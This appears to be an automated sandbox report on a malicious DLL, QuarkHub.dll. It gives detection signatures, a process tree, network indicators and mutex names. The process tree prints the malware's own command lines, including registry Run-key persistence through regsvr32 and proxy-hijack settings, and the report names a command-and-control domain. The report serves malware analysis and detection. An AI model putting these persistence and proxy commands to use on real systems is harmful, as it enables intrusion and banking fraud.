Edit tour

Windows Analysis Report
QuarkHub.dll

Overview

General Information

Sample name:	QuarkHub.dll
Analysis ID:	1369415
MD5:	36cd73ea4c74093a924120d8d4393e3f
SHA1:	97cbb92a05c1283c4b2a3b87a5b4bd86e743acb8
SHA256:	4f200426bf58e8d41b88edd66f3a8dd70b53e31b3903685024c1a68cb2750385
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Allocates memory in foreign processes

Creates a thread in another existing process (thread injection)

DLL side loading technique detected

Deletes itself after installation

Enables a proxy for the internet explorer

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Sets a proxy for the internet explorer

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Writes to foreign memory regions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Stores large binary data to the registry

Tries to load missing DLLs

Uses reg.exe to modify the Windows registry

Classification

Process Tree

System is w10x64

loaddll64.exe (PID: 7292 cmdline: loaddll64.exe "C:\Users\user\Desktop\QuarkHub.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)

conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7340 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QuarkHub.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

rundll32.exe (PID: 7368 cmdline: rundll32.exe "C:\Users\user\Desktop\QuarkHub.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)

msiexec.exe (PID: 7432 cmdline: C:\Windows\System32\msiexec.exe MD5: E5DA170027542E25EDE42FC54C929077)

rundll32.exe (PID: 7352 cmdline: rundll32.exe C:\Users\user\Desktop\QuarkHub.dll,Kzuhla MD5: EF3179D498793BF4234F708D3BE28633)

msiexec.exe (PID: 7424 cmdline: C:\Windows\System32\msiexec.exe MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7564 cmdline: C:\Windows\System32\msiexec.exe MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7620 cmdline: C:\Windows\System32\msiexec.exe MD5: E5DA170027542E25EDE42FC54C929077)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

reg.exe (PID: 4456 cmdline: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v QuarkHub /d "regsvr32.exe /s \"C:\Users\user\AppData\Roaming\Pfjsqg\QuarkHub.dll\"" MD5: 227F63E1D9008B36BDBCC4B397780BE4)

conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

regsvr32.exe (PID: 7920 cmdline: C:\Windows\system32\regsvr32.exe" /s "C:\Users\user\AppData\Roaming\Pfjsqg\QuarkHub.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

msiexec.exe (PID: 2336 cmdline: C:\Windows\System32\msiexec.exe MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 6952 cmdline: C:\Windows\System32\msiexec.exe MD5: E5DA170027542E25EDE42FC54C929077)

regsvr32.exe (PID: 23400 cmdline: C:\Windows\system32\regsvr32.exe" /s "C:\Users\user\AppData\Roaming\Pfjsqg\QuarkHub.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

msiexec.exe (PID: 22964 cmdline: C:\Windows\System32\msiexec.exe MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 23088 cmdline: C:\Windows\System32\msiexec.exe MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7680 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 7784 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 7976 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 8028 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)

reg.exe (PID: 8100 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings" /f /t REG_SZ /v "ProxyServer" /d "127.0.0.1:10351" MD5: 227F63E1D9008B36BDBCC4B397780BE4)

conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 8112 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings" /f /t REG_DWORD /v "ProxyEnable" /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7088 cmdline: C:\Windows\System32\msiexec.exe MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7464 cmdline: C:\Windows\System32\msiexec.exe MD5: E5DA170027542E25EDE42FC54C929077)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: unknown	HTTPS traffic detected: 104.21.33.213:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.213:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: QuarkHub.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: ntdll.pdb source: loaddll64.exe, 00000000.00000003.1678680571.0000021657CDE000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1686383589.0000021657E83000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1677430084.0000021657F8E000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1678027414.0000021657F9F000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1682626997.0000021657FFE000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1680085192.0000021657CD4000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1690767966.0000021657CDC000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1681446175.0000021657CD7000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1682038640.0000021657E66000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1677834264.0000021657E3C000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1694916814.0000021657CD6000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1685367991.0000021657E8F000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1687529504.0000021657CD1000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1683769782.0000021657E68000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1692851906.0000021657CD8000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1692131329.0000021657EAF000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1683127159.0000021657CD1000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1684278185.0000021658005000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1677009444.0000021657CD0000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1678881926.0000021657E43000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1685936772.0000021657CD2000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1679667370.0000021657E54000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1691697319.0000021657CD1000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1690315962.000002165805A000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1686994972.000002165803F000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1695356073.0000021657ECD000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1680576343.0000021657E57000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1689577958.0000021657E92000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1691190794.0000021657EB7000.00000004.00000020.00020000.00000000.s
Source:	Binary string: ntdll.pdbUGP source: loaddll64.exe, 00000000.00000003.1678680571.0000021657CDE000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1686383589.0000021657E83000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1677430084.0000021657F8E000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1678027414.0000021657F9F000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1682626997.0000021657FFE000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1680085192.0000021657CD4000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1690767966.0000021657CDC000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1681446175.0000021657CD7000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1682038640.0000021657E66000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1677834264.0000021657E3C000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1694916814.0000021657CD6000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1685367991.0000021657E8F000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1687529504.0000021657CD1000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1683769782.0000021657E68000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1692851906.0000021657CD8000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1692131329.0000021657EAF000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1683127159.0000021657CD1000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1684278185.0000021658005000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1677009444.0000021657CD0000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1678881926.0000021657E43000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1685936772.0000021657CD2000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1679667370.0000021657E54000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1691697319.0000021657CD1000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1690315962.000002165805A000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1686994972.000002165803F000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1695356073.0000021657ECD000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1680576343.0000021657E57000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1689577958.0000021657E92000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.1691190794.0000021657EB7000.00000004.00000020.00020000.0000000

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: adslstickermo.world

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Accept: */*User-Agent: User metricsHost: adslstickermo.worldContent-Length: 290Connection: CloseCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 54811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 62028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53883
Source: unknown	Network traffic detected: HTTP traffic on port 56415 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56913
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57369
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57890
Source: unknown	Network traffic detected: HTTP traffic on port 61753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55192
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58630 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55755
Source: unknown	Network traffic detected: HTTP traffic on port 55192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57336
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58630
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54270
Source: unknown	Network traffic detected: HTTP traffic on port 58644 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 57336 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61753
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56415
Source: unknown	Network traffic detected: HTTP traffic on port 49154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55765
Source: unknown	Network traffic detected: HTTP traffic on port 58184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56420
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54241
Source: unknown	Network traffic detected: HTTP traffic on port 53856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49159
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54846
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49154
Source: unknown	Network traffic detected: HTTP traffic on port 55765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58644
Source: unknown	Network traffic detected: HTTP traffic on port 56862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57369 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 54846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62028

Source: unknown	HTTPS traffic detected: 104.21.33.213:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.213:443 -> 192.168.2.4:49731 version: TLS 1.2

E-Banking Fraud

Sets a proxy for the internet explorer

Source: C:\Windows\System32\reg.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServer

Jump to behavior

Spam, unwanted Advertisements and Ransom Demands

Enables a proxy for the internet explorer

Source: C:\Windows\System32\reg.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyEnable

Jump to behavior

Sets a proxy for the internet explorer

Source: C:\Windows\System32\reg.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServer

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings" /f /t REG_SZ /v "ProxyServer" /d "127.0.0.1:10351"

Source: classification engine

Classification label: mal96.bank.adwa.spyw.evad.winDLL@49/38@2/3

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Pfjsqg

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{FC5D5ED9-3A64-C273-361D-D857CAA18C7B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{1222080D-8A08-25C7-7A91-BCEB4E55B04F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{68BC3349-A414-4063-668D-8847FA113C6B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{DE252571-E01C-7CCB-AE35-102FC23944D3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{26C4F29D-D358-BED7-4A21-0CFB1EE5005F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{1DB34FE9-D834-A603-862D-A8E71AB15C0B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{71DCDFF5-F0D0-0DEF-82F9-0493D63D7877}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{2ACBEE9D-9F58-1AD7-4A21-0CFB1EE5005F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{A0A1FDF5-76D0-DBEF-82F9-0493D63D7877}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{6B7BD7B9-9DC4-0E53-96FD-38372A81EC5B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{572F7B65-7580-EADF-B269-B48306AD2867}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{3E3E1091-90BC-34EB-4E55-B04F6259E4F3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{04B2DB1D-A1D8-3B57-CAA1-8C7B9E6580DF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{32563A79-2184-3F13-56BD-F8F7EA41AC1B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{337F7E19-50A4-63B3-765D-18970AE1CCBB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{C6C29671-9D1C-15CB-AE35-102FC23944D3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{92BE2ED9-CA64-1273-361D-D857CAA18C7B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{B871AA25-5540-C79F-7229-7443C66DE827}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{618875A9-42F4-91C3-46ED-68A7DA711CCB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{A499EFFD-F138-8337-2A81-EC5BFE45E0BF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{9AAE12E9-BF34-6103-862D-A8E71AB15C0B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F58F396D-4BE8-3E27-5AF1-9C4B2EB590AF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{D8FC6ACD-0DC8-5687-3A51-7CAB0E15700F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{21A3BCF5-29D0-F2EF-82F9-0493D63D7877}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{49C04E75-8D50-006F-0279-841356BDF8F7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F661EED1-59FC-ED2B-8E95-F08FA2992433}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{A1D2C691-CEBC-5AEB-4E55-B04F6259E4F3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{BCD6B95D-6B18-F397-0AE1-CCBBDEA5C01F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{EB4CCE1D-F8D8-A657-CAA1-8C7B9E6580DF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{EE0C728D-F288-7447-FA11-3C6BCED530CF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{A3692761-994C-043B-5E25-409F72297443}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{BD9A64C9-2794-EDE3-E60D-08C77A91BCEB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{BB6307AC-DF1B-09BE-05A0-7FD209D42326}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{93895F41-AFAC-671B-BE05-A07FD209D423}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{403A0995-CDF0-088F-A299-2433F6DD9817}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{FD288F41-1FAC-171B-BE05-A07FD209D423}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{D050604D-8548-6807-BAD1-FC2B8E95F08F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{B5B98AB1-845C-540B-EE75-506F02798413}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{C25D8739-8744-E9D3-167D-B8B7AA016CDB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{82133651-FB7C-20AB-0E15-700F2219A4B3}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{3711D7ED-5868-E0A7-DA71-1CCBAE35102F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F9309D39-A544-6FD3-167D-B8B7AA016CDB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{2B88150D-3308-BAC7-7A91-BCEB4E55B04F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{63846EAD-8028-6567-9A31-DC8B6EF5D0EF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{2A00BE35-BA10-C62F-C239-44D3167DB8B7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{C3303C9D-9558-98D7-4A21-0CFB1EE5005F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{A63F5AC5-0D60-E13F-92C9-94E3E60D08C7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{E419107D-97B8-F7B7-AA01-6CDB7EC5603F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{D56A10F9-0604-D993-D63D-78776AC12C9B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{18397364-A773-4636-1DD8-57CAA18C7B9E}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{8BFF1365-2D80-42DF-B269-B48306AD2867}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{24636165-2380-C0DF-B269-B48306AD2867}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{8CD94DC5-6460-4C3F-92C9-94E3E60D08C7}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{B684BB19-69A4-A8B3-765D-18970AE1CCBB}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{E7AB6A51-9F7C-74AB-0E15-700F2219A4B3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{DE9242A1-7B8C-017B-9E65-80DFB269B483}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{0E319B01-386C-D8DB-7EC5-603F92C994E3}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{1885A58B-BD6E-65F5-D0EF-82F90493D63D}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{DCF45CD5-8830-FDCF-E2D9-6473361DD857}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{FD86A279-6984-E713-56BD-F8F7EA41AC1B}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{79BDBA0D-9408-A7C7-7A91-BCEB4E55B04F}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{BDFFFCFD-9A38-1837-2A81-EC5BFE45E0BF}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{76FE159D-9A58-D9D7-4A21-0CFB1EE5005F}
